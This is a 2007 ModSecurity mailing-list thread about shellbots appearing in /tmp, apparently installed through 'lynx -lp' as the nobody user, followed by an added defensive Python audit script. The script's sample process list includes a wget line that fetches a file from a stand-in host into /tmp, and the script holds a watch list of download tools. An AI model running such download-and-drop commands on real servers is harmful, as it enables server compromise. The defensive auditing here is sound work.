[Modsecurity] Shellbot installation via lynx -lp

Michael Shinn mike at gotroot.com
Fri Sep 14 15:40:51 EDT 2007


It's an interesting one.  Do you have all the other download clients
covered?  (wget, ftp, ncftp, rsync, curl, scp, rcp, etc.)

It could also just be an internal function call in php (furl_open,
etc.).  Do you have all the bad PHP functions turned off?  (system, exec,
etc.)

Also, if you have the outbound firewall set up, why not stop all
connections to ports 80 and 443 outbound?

On Thu, 2007-09-13 at 13:43 -0400, admin at efastservers.com wrote:
> There seems to be a new way of installing shellbots into the /tmp
> directory on the server and I'm not positive on how it's being done.
> 
> I've noticed this on 2 of my client's servers in the past few weeks.
> 
> What's strange about it is mod_security has not caught it. Now we
> install a fairly complicated version of the rules on our client's
> servers. It includes lynx, at least 3 variations, and /usr/bin/lynx
> is chmod 750, yet it seems that this is how it's being installed at the
> moment.
> 
> I can't understand how lynx -lp is being executed. If it's chmod 750
> nobody from the internet can execute the command. Why do I think it's
> lynx -lp? Because I killed a pid that was executing lynx -lp as the
> user nobody.
> 
> They did not get far. The firewall denies all outbound connections and
> these bots usually try to make a connection outbound on port 6667.
> Even so, I'm frustrated as hell trying to find out how it's being done.
> I searched all the user logs using egrep and could not find an
> occurrence of lynx -lp but it was definitely there and the firewall
> did tell me that it was a suspicious process running.
> 
> I'm also surprised that our mod_sec rules, which are about 57k, did not
> catch it. If it was used as a cmd= or whatever, both cmd and lynx do
> exist in the rules, and the fact that lynx, wget, scp etc. are all chmod
> 750 is a mystery to me.
> 
> Unless it's being installed some other way other than via a malicious
> url I have no idea how it's getting dumped to /tmp.
> 
> Anyone?
> 
> 
> _______________________________________________
> Modsecurity mailing list
> Modsecurity at gotroot.com
> http://lists.gotroot.com/mailman/listinfo/modsecurity
-- 
Michael T. Shinn                                    KeyID:0xDAE2EC86
Key Fingerprint:  1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86
SANS Advisory Board Member
  
Got Root?  http://www.gotroot.com
modsecurity rules: http://www.modsecurityrules.com
Troubleshooting Firewalls:  http://troubleshootingfirewalls.com
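As an added example (not code from the list thread or from gotroot), the two checks discussed above can be turned into a small host audit: flag any of the download clients Michael lists running under the web-server account, as the reporter saw with lynx -lp as nobody, and list which of those binaries any local account can still execute (i.e. not restricted the way chmod 750 is meant to). The ps output is constructed sample input, and the web-server account names and search directories are assumptions to adjust per host.

```python
import os
import stat

# Download clients from Michael's list, plus lynx from the original report.
DOWNLOAD_CLIENTS = {"lynx", "wget", "ftp", "ncftp", "rsync", "curl", "scp", "rcp"}
# Accounts the web server commonly runs as (assumption; adjust for your hosts).
WEB_USERS = {"nobody", "apache", "www-data"}

# Constructed sample of `ps -eo user,pid,args` output (not a real capture).
SAMPLE_PS = """\
USER       PID COMMAND
root         1 /sbin/init
nobody    4321 /usr/bin/lynx -lp
nobody    4330 /usr/sbin/httpd -DFOREGROUND
www-data  5120 /usr/bin/wget -O /tmp/.s http://example.invalid/s
mike      6001 /usr/bin/curl https://example.invalid/
"""

def parse_ps(text):
    """Parse `ps -eo user,pid,args` style output into (user, pid, argv) tuples."""
    rows = []
    for line in text.strip().splitlines()[1:]:  # skip the header row
        parts = line.split(None, 2)
        if len(parts) == 3:
            rows.append((parts[0], int(parts[1]), parts[2].split()))
    return rows

def suspicious_downloads(rows):
    """Return (user, pid, cmdline) for download clients running as a web-server account."""
    hits = []
    for user, pid, argv in rows:
        if argv and user in WEB_USERS and os.path.basename(argv[0]) in DOWNLOAD_CLIENTS:
            hits.append((user, pid, " ".join(argv)))
    return hits

def others_can_execute(mode):
    """True if the 'other' execute bit is set, i.e. the binary is not locked down like chmod 750."""
    return bool(mode & stat.S_IXOTH)

def unrestricted_clients(search_dirs=("/usr/bin", "/bin")):
    """List download clients on this host that any local account can still execute."""
    found = []
    for d in search_dirs:
        for name in DOWNLOAD_CLIENTS:
            path = os.path.join(d, name)
            if os.path.isfile(path) and others_can_execute(os.stat(path).st_mode):
                found.append(path)
    return sorted(found)

if __name__ == "__main__":
    print("suspicious:", suspicious_downloads(parse_ps(SAMPLE_PS)))
    print("world-executable clients:", unrestricted_clients())
```

The mode check only covers the "chmod 750" point; a process already running as the web-server user, like the lynx -lp pid in the report, is what the ps check is for.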
